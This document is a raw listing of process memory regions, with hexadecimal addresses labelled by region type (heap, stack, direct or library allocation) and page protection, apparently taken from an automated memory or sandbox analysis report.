3937478000
stack
page read and write
17E8045A000
heap
page read and write
2A879A30000
direct allocation
page read and write
2A872B00000
heap
page read and write
1EC47146000
trusted library allocation
page read and write
2A85AB5D000
trusted library allocation
page read and write
2813831B000
heap
page read and write
7FFD9BDF0000
trusted library allocation
page read and write
71BC8FE000
stack
page read and write
FF0617E000
stack
page read and write
28138260000
heap
page read and write
3936D6E000
unkown
page read and write
B7C494C000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
1EC5EEB1000
heap
page read and write
2A873480000
direct allocation
page read and write
1AE006C0000
heap
page read and write
2A874780000
unclassified section
page read and write
17E80430000
heap
page read and write
17E803EC000
heap
page read and write
3B9D4FF000
stack
page read and write
E1EF6FC000
stack
page read and write
207C4100000
heap
page read and write
2A858A43000
heap
page read and write
2A8743F3000
unclassified section
page readonly
2066B440000
heap
page read and write
B7C4C7F000
stack
page read and write
1AE02C4E000
trusted library allocation
page read and write
C0003D0000
direct allocation
page read and write
201CC5AE000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page execute and read and write
1D66E880000
heap
page read and write
2A86B1A7000
trusted library allocation
page read and write
28139CA0000
direct allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
24150B38000
heap
page read and write
28139D60000
direct allocation
page read and write
7FFD9BE30000
trusted library allocation
page read and write
17EEA537000
trusted library allocation
page read and write
24150AC0000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
C0003AF000
direct allocation
page read and write
28139CE0000
direct allocation
page read and write
1AE02264000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
201CC5AA000
trusted library allocation
page read and write
17EEA4A5000
trusted library allocation
page read and write
FF063F8000
stack
page read and write
29E52AA0000
heap
page read and write
28138304000
heap
page read and write
201DAC8C000
trusted library allocation
page read and write
1D66E974000
heap
page read and write
7FFD9BB85000
trusted library allocation
page read and write
C0000C8000
direct allocation
page read and write
29E52AFC000
heap
page read and write
1EC46CB1000
trusted library allocation
page read and write
1EC46C50000
heap
page execute and read and write
1EC46C57000
heap
page execute and read and write
7FFD9BB90000
trusted library allocation
page execute and read and write
17EE9507000
trusted library allocation
page read and write
2A8743EA000
unclassified section
page read and write
1EC5EF50000
heap
page read and write
17EE59C0000
heap
page read and write
29E52B8F000
heap
page read and write
1EC4705E000
trusted library allocation
page read and write
FAB633A000
stack
page read and write
201CABC2000
trusted library allocation
page read and write
29E38834000
heap
page read and write
393767B000
stack
page read and write
17EEA565000
trusted library allocation
page read and write
201CBFD6000
trusted library allocation
page read and write
1F7E95A0000
heap
page read and write
2813BE15000
direct allocation
page read and write
1AE1A74A000
heap
page read and write
2813830F000
heap
page read and write
7FFD9BB5A000
trusted library allocation
page read and write
16107E40000
heap
page read and write
C00041A000
direct allocation
page read and write
201CA83F000
heap
page read and write
310FEB9000
stack
page read and write
29E52B23000
heap
page read and write
7DA60F9000
stack
page read and write
1EC56D24000
trusted library allocation
page read and write
2813833D000
heap
page read and write
1AE027A5000
trusted library allocation
page read and write
A11207E000
stack
page read and write
1AE02828000
trusted library allocation
page read and write
E1EF2FE000
stack
page read and write
1FF2D44A000
heap
page read and write
1EC5F060000
heap
page execute and read and write
179D3E99000
heap
page read and write
7DA6ECD000
stack
page read and write
C0000C4000
direct allocation
page read and write
1EA092E4000
heap
page read and write
2813BDCF000
direct allocation
page read and write
1EC46D37000
trusted library allocation
page read and write
7BB70FE000
stack
page read and write
201C8C70000
heap
page read and write
17EE5CE0000
trusted library section
page read and write
FAB6178000
stack
page read and write
310FE38000
stack
page read and write
2A872DC5000
heap
page read and write
1AE020F0000
trusted library allocation
page read and write
201CC051000
trusted library allocation
page read and write
179D1FFE000
heap
page read and write
17E80346000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7FFD9BCE0000
trusted library allocation
page read and write
1AE1A787000
heap
page read and write
179D3E9B000
heap
page read and write
1F7E9310000
heap
page read and write
AD62D8C000
stack
page read and write
2813832E000
heap
page read and write
7FFD9BDA0000
trusted library allocation
page read and write
A111DBF000
stack
page read and write
FF05E73000
stack
page read and write
7FFD9BB85000
trusted library allocation
page read and write
7FFD9BC1F000
trusted library allocation
page read and write
28139CE7000
direct allocation
page read and write
2813BC80000
direct allocation
page read and write
7BB74FE000
stack
page read and write
29E385E0000
heap
page read and write
201CA786000
heap
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
17EE9F71000
trusted library allocation
page read and write
1AE027F8000
trusted library allocation
page read and write
C0000A8000
direct allocation
page read and write
29E3AB01000
trusted library allocation
page read and write
7DA63FB000
stack
page read and write
C000489000
direct allocation
page read and write
C000335000
direct allocation
page read and write
7FFD9BDD0000
trusted library allocation
page execute and read and write
29E38766000
heap
page read and write
17EEA501000
trusted library allocation
page read and write
1AE02130000
trusted library allocation
page read and write
17EEA561000
trusted library allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
2066B3B0000
heap
page read and write
17EEA035000
trusted library allocation
page read and write
17EE74C0000
trusted library allocation
page read and write
1EC5EE79000
heap
page read and write
17E8033A000
heap
page read and write
1EC46B20000
heap
page execute and read and write
17EE84BC000
trusted library allocation
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
201C8C10000
heap
page read and write
1AE1A9A0000
heap
page read and write
FF0657E000
stack
page read and write
1EC5EDCC000
heap
page read and write
C000480000
direct allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
21EF0BC4000
heap
page read and write
29E52628000
heap
page read and write
2813BB60000
direct allocation
page read and write
E1EF5FE000
stack
page read and write
29E38720000
heap
page read and write
310FA7F000
stack
page read and write
29E38760000
heap
page read and write
C00043C000
direct allocation
page read and write
DD0667F000
stack
page read and write
7FFD9BD20000
trusted library allocation
page read and write
7FFD9BC20000
trusted library allocation
page read and write
39376FC000
stack
page read and write
2A872DD5000
heap
page read and write
17EE5D04000
heap
page read and write
1AE006D0000
heap
page read and write
1AE1A6E0000
heap
page read and write
DD066FF000
stack
page read and write
7FFD9BAC0000
trusted library allocation
page execute and read and write
17EE7390000
trusted library allocation
page read and write
1AE1A6F8000
heap
page read and write
1AE007C3000
heap
page read and write
2813BB20000
direct allocation
page read and write
1EC44F00000
trusted library allocation
page read and write
2A872AF4000
heap
page read and write
7DA6F0E000
stack
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
FAB62B9000
stack
page read and write
1AE027E6000
trusted library allocation
page read and write
2813836A000
heap
page read and write
29E3A6CF000
trusted library allocation
page read and write
2A85AAED000
trusted library allocation
page read and write
C000028000
direct allocation
page read and write
29E388F0000
heap
page read and write
2A85A480000
heap
page read and write
201C8F70000
heap
page read and write
29E388AC000
heap
page read and write
179D1FD8000
heap
page read and write
281382E4000
heap
page read and write
7FFD9B9A3000
trusted library allocation
page execute and read and write
2813BBC0000
direct allocation
page read and write
C0003B4000
direct allocation
page read and write
2A85ABAE000
trusted library allocation
page read and write
281382E1000
heap
page read and write
1AE027E9000
trusted library allocation
page read and write
17E80199000
heap
page read and write
17EE7330000
trusted library allocation
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
C00003D000
direct allocation
page read and write
17EE928A000
trusted library allocation
page read and write
201CBF9B000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
7FFD9BC60000
trusted library allocation
page read and write
C0003B2000
direct allocation
page read and write
7FFD9BB8A000
trusted library allocation
page read and write
1AE02B92000
trusted library allocation
page read and write
281384F4000
heap
page read and write
C000462000
direct allocation
page read and write
207C42D0000
heap
page read and write
7BB76FE000
stack
page read and write
E1EF77B000
stack
page read and write
E1EF478000
stack
page read and write
7FFD9BB51000
trusted library allocation
page read and write
2813BCE0000
direct allocation
page read and write
29E52800000
heap
page read and write
161081B0000
heap
page read and write
7FFD9B9BB000
trusted library allocation
page read and write
7DA6076000
stack
page read and write
161081B4000
heap
page read and write
29E4A1F1000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
1FF2D447000
heap
page read and write
C00048D000
direct allocation
page read and write
2A874787000
unclassified section
page read and write
310F76F000
stack
page read and write
7FFD9BB40000
trusted library allocation
page execute and read and write
2A872BE0000
heap
page read and write
1AE126E1000
trusted library allocation
page read and write
2A872D8B000
heap
page read and write
C0000E8000
direct allocation
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
17EE97DA000
trusted library allocation
page read and write
1AE1A7B5000
heap
page read and write
2813839C000
heap
page read and write
16107F60000
heap
page read and write
C00047C000
direct allocation
page read and write
2A8589F0000
heap
page read and write
7FFD9BC50000
trusted library allocation
page read and write
1AE026F8000
trusted library allocation
page read and write
179D1FC9000
heap
page read and write
B842C7C000
stack
page read and write
28138303000
heap
page read and write
1EC44F30000
trusted library allocation
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
FAB63BF000
stack
page read and write
F1D296E000
stack
page read and write
17EE59E0000
heap
page read and write
B7326FF000
stack
page read and write
7FFD9BE10000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
1F98432A000
heap
page read and write
7FFD9BD20000
trusted library allocation
page read and write
2813BC00000
direct allocation
page read and write
E1F01CE000
stack
page read and write
7DA61F9000
stack
page read and write
C0003CC000
direct allocation
page read and write
C0004A0000
direct allocation
page read and write
2A8730B0000
direct allocation
page execute and read and write
FF06FCE000
stack
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
29E3B4E8000
trusted library allocation
page read and write
2A85A583000
heap
page read and write
352AFE000
stack
page read and write
7FFD9BB52000
trusted library allocation
page read and write
2A8743ED000
unclassified section
page read and write
1AE00734000
heap
page read and write
1D66E8A0000
heap
page read and write
FF06279000
stack
page read and write
1EC482C2000
trusted library allocation
page read and write
28138316000
heap
page read and write
28138319000
heap
page read and write
1AE02764000
trusted library allocation
page read and write
C00004B000
direct allocation
page read and write
2A874788000
unclassified section
page readonly
7FFD9BB61000
trusted library allocation
page read and write
2A85A756000
heap
page execute and read and write
C000006000
direct allocation
page read and write
7FFD9BA36000
trusted library allocation
page read and write
2A879A40000
direct allocation
page read and write
1F7E9367000
heap
page read and write
17E16E00000
heap
page read and write
C000056000
direct allocation
page read and write
7FFD9BA56000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
393717B000
stack
page read and write
7FFD9B9A4000
trusted library allocation
page read and write
17EE5B49000
heap
page read and write
17EE98A6000
trusted library allocation
page read and write
17E16F25000
heap
page read and write
28139CE3000
direct allocation
page read and write
17E80180000
heap
page read and write
E1EF0FE000
stack
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
C0000C2000
direct allocation
page read and write
201CC286000
trusted library allocation
page read and write
201CA8B1000
heap
page read and write
30449CD000
stack
page read and write
17EE82E5000
trusted library allocation
page read and write
39384CF000
stack
page read and write
7BB6CFA000
stack
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
2A85ABAA000
trusted library allocation
page read and write
7DA637B000
stack
page read and write
7FFD9BC50000
trusted library allocation
page read and write
FAB653B000
stack
page read and write
E1F038F000
stack
page read and write
2A85A770000
heap
page execute and read and write
7FFD9BBC0000
trusted library allocation
page read and write
FF05FFE000
stack
page read and write
FAB607E000
stack
page read and write
1AE02705000
trusted library allocation
page read and write
1AE00730000
heap
page read and write
7FFD9BD40000
trusted library allocation
page read and write
1AE02150000
heap
page read and write
393860E000
stack
page read and write
17EE5A50000
heap
page read and write
1AE1A779000
heap
page read and write
17EEA4FF000
trusted library allocation
page read and write
29E38930000
trusted library allocation
page read and write
1AE12760000
trusted library allocation
page read and write
71BC4FE000
stack
page read and write
201E2FB3000
heap
page read and write
24150B3A000
heap
page read and write
FAB60FE000
stack
page read and write
7FFD9BB82000
trusted library allocation
page read and write
310FB7E000
stack
page read and write
7DA700C000
stack
page read and write
17E80224000
heap
page read and write
1EC48328000
trusted library allocation
page read and write
3B9D47F000
stack
page read and write
2A8799A0000
direct allocation
page read and write
17EE9F6F000
trusted library allocation
page read and write
269930F000
stack
page read and write
7FFD9BCC0000
trusted library allocation
page read and write
7DA5FFD000
stack
page read and write
C000366000
direct allocation
page read and write
2813830A000
heap
page read and write
1EC44FC6000
heap
page read and write
281382EE000
heap
page read and write
2A87478D000
unclassified section
page readonly
7FFD9BC00000
trusted library allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
1EC4503C000
heap
page read and write
C000010000
direct allocation
page read and write
17EE5CF0000
trusted library allocation
page read and write
29E38A00000
heap
page execute and read and write
29E526AB000
heap
page read and write
17EE84C3000
trusted library allocation
page read and write
25BE6120000
heap
page read and write
28138307000
heap
page read and write
1AE02727000
trusted library allocation
page read and write
FAB64BE000
stack
page read and write
17EEA4D3000
trusted library allocation
page read and write
1DF581F0000
heap
page read and write
201E2FED000
heap
page read and write
17EE73C0000
trusted library allocation
page read and write
2A872D59000
heap
page read and write
2A8743B3000
unclassified section
page write copy
24150B30000
heap
page read and write
310FD3E000
stack
page read and write
201CC4E4000
trusted library allocation
page read and write
2A85AAE6000
trusted library allocation
page read and write
1AE1A705000
heap
page read and write
1AE0075E000
heap
page read and write
FF06379000
stack
page read and write
17EE74C3000
trusted library allocation
page read and write
1EC470EC000
trusted library allocation
page read and write
2A8730A0000
heap
page read and write
C0000BA000
direct allocation
page read and write
1F7E9360000
heap
page read and write
201CA630000
trusted library allocation
page read and write
AD6307F000
stack
page read and write
7DA710D000
stack
page read and write
7FFD9BD10000
trusted library allocation
page read and write
FF070CD000
stack
page read and write
C0000B4000
direct allocation
page read and write
29E52674000
heap
page read and write
7FFD9B9A2000
trusted library allocation
page read and write
1EC5EDC9000
heap
page read and write
C0003C6000
direct allocation
page read and write
2A858A32000
heap
page read and write
201CA780000
heap
page read and write
2813837D000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
2813833E000
heap
page read and write
1EC46ED7000
trusted library allocation
page read and write
1DF582A0000
heap
page read and write
1EC5F0EB000
heap
page read and write
17EEA523000
trusted library allocation
page read and write
C0000BE000
direct allocation
page read and write
28138374000
heap
page read and write
C000051000
direct allocation
page read and write
7FFD9BC40000
trusted library allocation
page read and write
2813BCA0000
direct allocation
page read and write
2813BD20000
direct allocation
page read and write
7FFD9B9CB000
trusted library allocation
page read and write
1EA09100000
heap
page read and write
C000498000
direct allocation
page read and write
310FCF9000
stack
page read and write
1FF2D420000
heap
page read and write
C0003DB000
direct allocation
page read and write
1EC46B40000
trusted library allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
17EE5D00000
heap
page read and write
2813BB80000
direct allocation
page read and write
C000392000
direct allocation
page read and write
17E80433000
heap
page read and write
7DA59EE000
stack
page read and write
29E52BA6000
heap
page read and write
17EEA455000
trusted library allocation
page read and write
179D3B40000
heap
page read and write
17EEA54B000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page execute and read and write
C000190000
direct allocation
page read and write
25BE6124000
heap
page read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
C000062000
direct allocation
page read and write
39382CC000
stack
page read and write
2A86A80A000
trusted library allocation
page read and write
17EEA51B000
trusted library allocation
page read and write
7FFD9BA66000
trusted library allocation
page read and write
7DA6E4E000
stack
page read and write
7FFD9BD04000
trusted library allocation
page read and write
281382C0000
heap
page read and write
2A872D82000
heap
page read and write
17EE7430000
heap
page execute and read and write
2A8743B0000
unclassified section
page write copy
39383CB000
stack
page read and write
1AE1A7D3000
heap
page read and write
29E52692000
heap
page read and write
C0000A0000
direct allocation
page read and write
1EC44F7D000
heap
page read and write
C000460000
direct allocation
page read and write
7FFD9BA60000
trusted library allocation
page execute and read and write
179D1FC5000
heap
page read and write
7FFD9B99B000
trusted library allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
FF062F7000
stack
page read and write
29E52ACB000
heap
page read and write
2813BC57000
direct allocation
page read and write
1EA08F30000
heap
page read and write
269938F000
stack
page read and write
1F984320000
heap
page read and write
2A8743B2000
unclassified section
page read and write
1AE12754000
trusted library allocation
page read and write
7FFD9BBE3000
trusted library allocation
page read and write
17EEA453000
trusted library allocation
page read and write
2A872BE7000
heap
page read and write
1EC46B70000
trusted library allocation
page read and write
1DF58110000
heap
page read and write
17E80253000
heap
page read and write
1EC488DC000
trusted library allocation
page read and write
201CB5C2000
trusted library allocation
page read and write
E1F028E000
stack
page read and write
29E3A8E7000
trusted library allocation
page read and write
C000450000
direct allocation
page read and write
17EE79DB000
trusted library allocation
page read and write
17EEA58F000
trusted library allocation
page read and write
1DF58490000
heap
page read and write
2813BB40000
direct allocation
page read and write
1AE1A79E000
heap
page read and write
393854D000
stack
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
207C40D0000
heap
page read and write
2A8743AE000
unclassified section
page write copy
3938249000
stack
page read and write
7FFD9BC20000
trusted library allocation
page read and write
1EC44F20000
heap
page read and write
201C8D0D000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
7FFD9BB50000
trusted library allocation
page read and write
2A85A781000
trusted library allocation
page read and write
7FFD9BA60000
trusted library allocation
page execute and read and write
28138379000
heap
page read and write
1AE02266000
heap
page read and write
17EE9E56000
trusted library allocation
page read and write
FAB6F8C000
stack
page read and write
1EC46BB0000
trusted library allocation
page read and write
201C8F74000
heap
page read and write
179D200E000
heap
page read and write
FAB61BE000
stack
page read and write
1AE00787000
heap
page read and write
2813BDE0000
direct allocation
page read and write
7FFD9BB42000
trusted library allocation
page read and write
FF0704E000
stack
page read and write
AD630FF000
stack
page read and write
201CA590000
heap
page readonly
7FFD9B9B3000
trusted library allocation
page execute and read and write
FAB643E000
stack
page read and write
21EF0BDA000
heap
page read and write
179D2004000
heap
page read and write
7FFD9B98D000
trusted library allocation
page execute and read and write
FAB5FFE000
stack
page read and write
7FFD9BB61000
trusted library allocation
page read and write
393757E000
stack
page read and write
C000324000
direct allocation
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
17EE9D6D000
trusted library allocation
page read and write
17EEA4E9000
trusted library allocation
page read and write
2A86C5A7000
trusted library allocation
page read and write
17EEA01B000
trusted library allocation
page read and write
29E3AF31000
trusted library allocation
page read and write
7FFD9BC90000
trusted library allocation
page read and write
1EC482C0000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
28139D00000
direct allocation
page read and write
C00005C000
direct allocation
page read and write
3937277000
stack
page read and write
1AE02832000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
7FFD9BC60000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page execute and read and write
1EC5EE26000
heap
page read and write
2A85A410000
trusted library allocation
page read and write
7FFD9BDB0000
trusted library allocation
page read and write
7FFD9B9BB000
trusted library allocation
page read and write
17EEA4BB000
trusted library allocation
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
C000012000
direct allocation
page read and write
1EA08F40000
heap
page read and write
29E52ABB000
heap
page read and write
17EE5AD9000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
7FFD9BAD0000
trusted library allocation
page execute and read and write
7FFD9BC90000
trusted library allocation
page read and write
7FFD9BB82000
trusted library allocation
page read and write
7DF4146E0000
trusted library allocation
page execute and read and write
7FFD9B982000
trusted library allocation
page read and write
201CA7F8000
heap
page read and write
2813830A000
heap
page read and write
393807E000
stack
page read and write
1EA08F00000
heap
page read and write
29E387FC000
heap
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
28138386000
heap
page read and write
1F7E936A000
heap
page read and write
1FF2D3E0000
heap
page read and write
2A85AB61000
trusted library allocation
page read and write
C000274000
direct allocation
page read and write
201E2FE9000
heap
page read and write
7FFD9BCD0000
trusted library allocation
page read and write
29E52780000
heap
page execute and read and write
C000400000
direct allocation
page read and write
1AE0081C000
heap
page read and write
17EEA539000
trusted library allocation
page read and write
28138301000
heap
page read and write
28138390000
heap
page read and write
2813838D000
heap
page read and write
17EE7380000
heap
page read and write
1FF2D414000
heap
page read and write
201E2FC2000
heap
page read and write
281382E2000
heap
page read and write
3044C7F000
stack
page read and write
2813BC40000
direct allocation
page read and write
1EC48591000
trusted library allocation
page read and write
2813BDC0000
direct allocation
page read and write
1EC5F0C4000
heap
page read and write
1AE02260000
heap
page read and write
C000436000
direct allocation
page read and write
281382EF000
heap
page read and write
C0000B6000
direct allocation
page read and write
7FFD9BC50000
trusted library allocation
page read and write
29E3A6AE000
trusted library allocation
page read and write
28139D40000
direct allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
7FFD9BA66000
trusted library allocation
page read and write
310FBFE000
stack
page read and write
C000456000
direct allocation
page read and write
2813BD00000
direct allocation
page read and write
17E80368000
heap
page read and write
E1EF579000
stack
page read and write
2813834F000
heap
page read and write
2A8743E1000
unclassified section
page read and write
1AE1A980000
heap
page execute and read and write
17E18870000
heap
page read and write
3937378000
stack
page read and write
E1F024D000
stack
page read and write
7FFD9BC20000
trusted library allocation
page read and write
7FFD9BB42000
trusted library allocation
page read and write
21EF0BC0000
heap
page read and write
7FFD9BA86000
trusted library allocation
page execute and read and write
7DA6DCE000
stack
page read and write
17E80381000
heap
page read and write
179D3E9A000
heap
page read and write
FF0647E000
stack
page read and write
21EF0AF0000
heap
page read and write
179D3E96000
heap
page read and write
C00004D000
direct allocation
page read and write
2813831B000
heap
page read and write
2A858D90000
heap
page read and write
17EE74D6000
heap
page read and write
201CA7E0000
heap
page read and write
1D66E7A0000
heap
page read and write
25BE5E20000
heap
page read and write
2A873028000
direct allocation
page read and write
C0002FC000
direct allocation
page read and write
7DA5D7E000
stack
page read and write
1F7E9330000
heap
page read and write
201C8CF3000
heap
page read and write
179D3E93000
heap
page read and write
1AE126F1000
trusted library allocation
page read and write
7FFD9BC80000
trusted library allocation
page read and write
29E38888000
heap
page read and write
39371FE000
stack
page read and write
3936DED000
stack
page read and write
28138370000
heap
page read and write
2A85A3F0000
trusted library allocation
page read and write
21EF0BD7000
heap
page read and write
1EC5F0A1000
heap
page read and write
2A85A490000
trusted library allocation
page read and write
1EC5F0A9000
heap
page read and write
7FFD9BA3C000
trusted library allocation
page execute and read and write
2A872DA4000
heap
page read and write
201E2FDD000
heap
page read and write
2A85A760000
direct allocation
page read and write
17E804BB000
heap
page read and write
17E802B9000
heap
page read and write
17EEA4B9000
trusted library allocation
page read and write
C000424000
direct allocation
page read and write
25BE5F09000
heap
page read and write
281382EA000
heap
page read and write
7FFD9BB31000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
1AE026D0000
heap
page execute and read and write
207C4107000
heap
page read and write
1AE02110000
trusted library allocation
page read and write
29E3A6B6000
trusted library allocation
page read and write
29E3B305000
trusted library allocation
page read and write
2A8743EB000
unclassified section
page write copy
17E171C5000
heap
page read and write
7FFD9BC60000
trusted library allocation
page read and write
2A858DB6000
heap
page read and write
2A85AAFF000
trusted library allocation
page read and write
2813832D000
heap
page read and write
7FFD9BA70000
trusted library allocation
page execute and read and write
17EE5AAD000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
2066B450000
heap
page read and write
24150D60000
heap
page read and write
2813830E000
heap
page read and write
2A8799AA000
direct allocation
page read and write
17EEA005000
trusted library allocation
page read and write
1AE1ACC0000
heap
page read and write
28139DA3000
heap
page read and write
29E52AC0000
heap
page read and write
1FF2D440000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
7FFD9B983000
trusted library allocation
page execute and read and write
2813834E000
heap
page read and write
201CBFD8000
trusted library allocation
page read and write
7DA5CFE000
stack
page read and write
7FFD9BA6C000
trusted library allocation
page execute and read and write
1AE0077D000
heap
page read and write
2A8743AF000
unclassified section
page read and write
29E3B297000
trusted library allocation
page read and write
3B9D1EC000
stack
page read and write
201CC350000
trusted library allocation
page read and write
1EC56CC0000
trusted library allocation
page read and write
FAB5F79000
stack
page read and write
7FFD9BC20000
trusted library allocation
page read and write
1AE027E3000
trusted library allocation
page read and write
2813837F000
heap
page read and write
7FFD9B9BD000
trusted library allocation
page execute and read and write
1AE027E0000
trusted library allocation
page read and write
2A874789000
unclassified section
page write copy
2A858A8D000
heap
page read and write
201C8D38000
heap
page read and write
2A8589C0000
heap
page read and write
1EC5F0D6000
heap
page read and write
2813BCC0000
direct allocation
page read and write
2A872D60000
heap
page read and write
2A872CED000
heap
page read and write
17EE7357000
heap
page execute and read and write
7DF499380000
trusted library allocation
page execute and read and write
FF05BFE000
stack
page read and write
E1F030E000
stack
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
7BB6FFD000
stack
page read and write
FF0607C000
stack
page read and write
7DA617C000
stack
page read and write
2A858A30000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
29E387F2000
heap
page read and write
C0004A2000
direct allocation
page read and write
C000086000
direct allocation
page read and write
7FFD9BB6A000
trusted library allocation
page read and write
29E3BDE3000
trusted library allocation
page read and write
17EE8586000
trusted library allocation
page read and write
1EC46B30000
heap
page readonly
7FFD9BC50000
trusted library allocation
page read and write
201CAA19000
trusted library allocation
page read and write
C00046C000
direct allocation
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
29E52AFF000
heap
page read and write
2A872D27000
heap
page read and write
201C8CED000
heap
page read and write
71BC2FE000
stack
page read and write
1EA092E0000
heap
page read and write
E1F068E000
stack
page read and write
2066B448000
heap
page read and write
21EF0AD0000
heap
page read and write
7DA5E7D000
stack
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
1DF58494000
heap
page read and write
1AE1A8A0000
heap
page read and write
FF060FE000
stack
page read and write
179D1FD8000
heap
page read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
17EE5CF7000
trusted library allocation
page read and write
201E2FD4000
heap
page read and write
29E4A1D1000
trusted library allocation
page read and write
1D66E6A7000
heap
page read and write
E1F070F000
stack
page read and write
7FFD9BC60000
trusted library allocation
page read and write
C00046A000
direct allocation
page read and write
2A872B82000
heap
page read and write
179D1FD8000
heap
page read and write
201CC02E000
trusted library allocation
page read and write
29E3A6A6000
trusted library allocation
page read and write
C0002CF000
direct allocation
page read and write
281384D0000
heap
page read and write
17E16F52000
heap
page read and write
7FFD9BBA0000
trusted library allocation
page execute and read and write
C0003DD000
direct allocation
page read and write
7FFD9B9AD000
trusted library allocation
page execute and read and write
1AE1A6F1000
heap
page read and write
7FFD9BDE0000
trusted library allocation
page read and write
71BC2F4000
stack
page read and write
29E386E0000
heap
page read and write
2A858DB0000
heap
page read and write
2A873020000
direct allocation
page read and write
97D5F3C000
stack
page read and write
29E387FA000
heap
page read and write
C00041E000
direct allocation
page read and write
201C8CB0000
heap
page read and write
7FFD9BC40000
trusted library allocation
page read and write
29E3AF3D000
trusted library allocation
page read and write
29E3B2BE000
trusted library allocation
page read and write
29E52760000
trusted library allocation
page read and write
3044CFF000
stack
page read and write
7FFD9BA96000
trusted library allocation
page execute and read and write
1EC4713E000
trusted library allocation
page read and write
17E16D20000
heap
page read and write
28138356000
heap
page read and write
16108120000
heap
page read and write
C00048B000
direct allocation
page read and write
29E526A9000
heap
page read and write
201CC053000
trusted library allocation
page read and write
25BE5F00000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
B7C49CF000
stack
page read and write
7FFD9BCB0000
trusted library allocation
page read and write
17E803C5000
heap
page read and write
29E38764000
heap
page read and write
7FFD9BB52000
trusted library allocation
page read and write
2A8799ED000
direct allocation
page read and write
2A872B85000
heap
page read and write
7FFD9BA5C000
trusted library allocation
page execute and read and write
E1EF1FD000
stack
page read and write
29E3B22A000
trusted library allocation
page read and write
2813831B000
heap
page read and write
2A872B6A000
heap
page read and write
1AE006F0000
heap
page read and write
29E38790000
trusted library allocation
page read and write
28139D20000
direct allocation
page read and write
21EF09F0000
heap
page read and write
201E3333000
heap
page read and write
2A85AAF7000
trusted library allocation
page read and write
C000500000
direct allocation
page read and write
E1F040C000
stack
page read and write
28138305000
heap
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
201CA5F0000
heap
page execute and read and write
281382FF000
heap
page read and write
F1D28EC000
stack
page read and write
2813BD6E000
direct allocation
page read and write
1EC482BC000
trusted library allocation
page read and write
29E521DD000
heap
page read and write
201CC22B000
trusted library allocation
page read and write
17E81EE0000
heap
page read and write
7FFD9BB92000
trusted library allocation
page read and write
2813831B000
heap
page read and write
2813839C000
heap
page read and write
29E52A90000
heap
page read and write
2A85B3B3000
trusted library allocation
page read and write
29E4A244000
trusted library allocation
page read and write
17EE84D4000
trusted library allocation
page read and write
17EE5A57000
heap
page read and write
7FFD9BCF0000
trusted library allocation
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
7FFD9B9A3000
trusted library allocation
page execute and read and write
7FFD9BB20000
trusted library allocation
page read and write
201DAC7F000
trusted library allocation
page read and write
2813BD70000
direct allocation
page read and write
29E3BB45000
trusted library allocation
page read and write
35277B000
stack
page read and write
179D2100000
heap
page read and write
7FFD9B984000
trusted library allocation
page read and write
7FFD9BC10000
trusted library allocation
page read and write
310F7EF000
stack
page read and write
2A8799C9000
direct allocation
page read and write
FAB5BEE000
stack
page read and write
310FDB7000
stack
page read and write
7FFD9BC10000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
29E4A4C1000
trusted library allocation
page read and write
201C8D33000
heap
page read and write
207C4314000
heap
page read and write
281382EB000
heap
page read and write
C00007A000
direct allocation
page read and write
7DA708E000
stack
page read and write
17EE74D4000
heap
page read and write
2A873090000
direct allocation
page read and write
1AE02120000
heap
page readonly
1EC5EDD5000
heap
page read and write
7FFD9BC70000
trusted library allocation
page read and write
17EE7821000
trusted library allocation
page read and write
29E3BD1A000
trusted library allocation
page read and write
16107F67000
heap
page read and write
201CA980000
heap
page read and write
201C8CB9000
heap
page read and write
17EE5A40000
trusted library section
page read and write
201CA67A000
heap
page read and write
2A872D9A000
heap
page read and write
28138303000
heap
page read and write
